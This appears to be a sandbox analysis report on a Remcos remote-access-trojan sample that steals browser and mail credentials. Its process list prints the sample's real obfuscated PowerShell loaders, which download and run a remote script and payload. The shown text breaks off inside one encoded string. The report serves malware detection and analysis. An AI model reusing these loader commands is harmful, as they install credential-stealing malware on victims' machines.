Analysis Overview
SHA256
08ddc21fdf4ccd1ae678df5479c23128c933bb11393ca4660e1f6e213b246c64
Threat Level: Known bad
The file af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.zip was found to be: Known bad.
Malicious Activity Summary
Remcos
NirSoft WebBrowserPassView
Detected Nirsoft tools
Credentials from Password Stores: Credentials from Web Browsers
NirSoft MailPassView
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Blocklisted process makes network request
Reads user/profile data of web browsers
Checks computer location settings
Accesses Microsoft Outlook accounts
Suspicious use of SetThreadContext
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Modifies Internet Explorer settings
Modifies registry class
Suspicious behavior: MapViewOfSection
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-08-07 07:17
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-07 07:17
Reported
2024-08-07 07:17
Platform
win7-20240704-en
Max time kernel
18s
Max time network
16s
Command Line
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\cmd.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\af3d6095ad1ce9cc31549c93bf7858e2989d725e2c7a34adb975b76c09bac8ba.hta"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" "/c poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
poWERshelL.exe -Ex BypasS -noP -W 1 -c DeVIcecreDENTIAldePlOYmeNt ; iEx($(IEx('[SYsteM.TExT.eNcodiNg]'+[chaR]0x3A+[ChAr]0X3A+'UtF8.GeTstRinG([sYStEM.convERt]'+[CHaR]0x3A+[cHAr]0x3a+'froMBASe64sTRIng('+[chAr]34+'JDAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtYkVSZEVGaW5JdElPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTW9uIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB0cVZsSmJiLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBCUVRyUCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgeXYsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuQ1JscyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaURCcnMpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIk9yaiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVzcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB6YlhvVEFTVEFLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDA6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDcuMTczLjE5Mi4xMzUvODgva2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luZy5nSUYiLCIkZW52OkFQUERBVEFca2lkc3Jvc2VmYWNpbmdpbWFnZXN0cmlja2luLnZCUyIsMCwwKTtTVEFydC1zTGVlUCgzKTtTVGFydCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVudjpBUFBEQVRBXGtpZHNyb3NlZmFjaW5naW1hZ2VzdHJpY2tpbi52QlMi'+[chAR]34+'))')))"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\e410m-ly.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES8D24.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC8D23.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\kidsrosefacingimagestrickin.vBS"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴c≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴C8≩ ⫻ ㏤ ≪ ㏴LwBz≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cgB2≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴dwBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bu≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴LgBj≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴cg≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴cw≩ ⫻ ㏤ ≪ ㏴v≩ ⫻ ㏤ ≪ ㏴HY≩ ⫻ ㏤ ≪ ㏴YgBz≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴agBw≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴ZQBi≩ ⫻ ㏤ ≪ ㏴EM≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bgB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB3≩ ⫻ ㏤ ≪ ㏴C0≩ ⫻ ㏤ ≪ ㏴TwBi≩ ⫻ ㏤ ≪ ㏴Go≩ ⫻ ㏤ ≪ ㏴ZQBj≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴Hk≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴bQ≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴E4≩ ⫻ ㏤ ≪ ㏴ZQB0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴VwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgB5≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴ew≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴dwBl≩ ⫻ ㏤ ≪ ㏴GI≩ ⫻ ㏤ ≪ ㏴QwBs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴LgBE≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dwBu≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBh≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴R≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴YQ≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴aw≩ ⫻ ㏤ ≪ ㏴p≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴fQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴a≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴BX≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴aQB0≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴LQBI≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴JwBG≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴aQBs≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴bw≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴bwB3≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴YQB0≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bm≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴bwBt≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bs≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBr≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴t≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴ZwBy≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴dQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴QwBv≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴bwBy≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴UgBl≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴B9≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴LQBu≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴dQBs≩ ⫻ ㏤ ≪ ㏴Gw≩ ⫻ ㏤ ≪ ㏴KQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Hs≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bQBh≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴ZQBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴PQ≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴Fs≩ ⫻ ㏤ ≪ ㏴UwB5≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴LgBU≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴B0≩ ⫻ ㏤ ≪ ㏴C4≩ ⫻ ㏤ ≪ ㏴RQBu≩ ⫻ ㏤ ≪ ㏴GM≩ ⫻ ㏤ ≪ ㏴bwBk≩ ⫻ ㏤ ≪ ㏴Gk≩ ⫻ ㏤ ≪ ㏴bgBn≩ ⫻ ㏤ ≪ ㏴F0≩ ⫻ ㏤ ≪ ㏴Og≩ ⫻ ㏤ ≪ ㏴6≩ ⫻ ㏤ ≪ ㏴FU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴BG≩ ⫻ ㏤ ≪ ㏴Dg≩ ⫻ ㏤ ≪ ㏴LgBH≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BT≩ ⫻ ㏤ ≪ ㏴HQ≩ ⫻ ㏤ ≪ ㏴cgBp≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴o≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bv≩ ⫻ ㏤ ≪ ㏴Hc≩ ⫻ ㏤ ≪ ㏴bgBs≩ ⫻ ㏤ ≪ ㏴G8≩ ⫻ ㏤ ≪ ㏴YQBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴BE≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴Ck≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴cwB0≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴cgB0≩ ⫻ ㏤ ≪ ㏴EY≩ ⫻ ㏤ ≪ ㏴b≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴Gc≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴Jw≩ ⫻ ㏤ ≪ ㏴8≩ ⫻ ㏤ ≪ ㏴Dw≩ ⫻ ㏤ ≪ ㏴QgBB≩ ⫻ ㏤ ≪ ㏴FM≩ ⫻ ㏤ ≪ ㏴RQ≩ ⫻ ㏤ ≪ ㏴2≩ ⫻ ㏤ ≪ ㏴DQ≩ ⫻ ㏤ ≪ ㏴XwBT≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴QQBS≩ ⫻ ㏤ ≪ ㏴FQ≩ ⫻ ㏤ ≪ ㏴Pg≩ ⫻ ㏤ ≪ ㏴+≩ ⫻ ㏤ ≪ ㏴Cc≩ ⫻ ㏤ ≪ ㏴Ow≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴CQ≩ ⫻ ㏤ ≪ ㏴ZQBu≩ ⫻ ㏤ ≪ ㏴GQ≩ ⫻ ㏤ ≪ ㏴RgBs≩ ⫻ ㏤ ≪ ㏴GE≩ ⫻ ㏤ ≪ ㏴Zw≩ ⫻ ㏤ ≪ ㏴g≩ ⫻ ㏤ ≪ ㏴D0≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Dw≩ ⫻ ㏤ ≪ ㏴P≩ ⫻ ㏤ ≪ ㏴BC≩ ⫻ ㏤ ≪ ㏴EE≩ ⫻ ㏤ ≪ ㏴UwBF≩ ⫻ ㏤ ≪ ㏴DY≩ ⫻ ㏤ ≪ ㏴N≩ ⫻ ㏤ ≪ ㏴Bf≩ ⫻ ㏤ ≪ ㏴EU≩ ⫻ ㏤ ≪ ㏴TgBE≩ ⫻ ㏤ ≪ ㏴D4≩ ⫻ ㏤ ≪ ㏴Pg≩ ⫻ ㏤ ≪ ㏴n≩ ⫻ ㏤ ≪ ㏴Ds≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴BJ≩ ⫻ ㏤ ≪ ㏴G4≩ ⫻ ㏤ ≪ ㏴Z≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴I≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴9≩ ⫻ ㏤ ≪ ㏴C≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴J≩ ⫻ ㏤ ≪ ㏴Bp≩ ⫻ ㏤ ≪ ㏴G0≩ ⫻ ㏤ ≪ ㏴YQBn≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴V≩ ⫻ ㏤ ≪ ㏴Bl≩ ⫻ ㏤ ≪ ㏴Hg≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴u≩ ⫻ ㏤ ≪ ㏴Ek≩ ⫻ ㏤ ≪ ㏴bgBk≩ ⫻ ㏤ ≪ ㏴GU≩ ⫻ ㏤ ≪ ㏴e≩ ⫻ ㏤ ≪ ㏴BP≩ ⫻ ㏤ ≪ ㏴GY≩ ⫻ ㏤ ≪ ㏴K≩ ⫻ ㏤ ≪ ㏴≩ ⫻ ㏤ ≪ ㏴k≩ ⫻ ㏤ ≪ ㏴HM≩ ⫻ ㏤ ≪ ㏴d≩ ⫻ ㏤ ≪ ㏴Bh≩ ⫻ ㏤ ≪ ㏴HI≩ ⫻ ㏤ ≪ 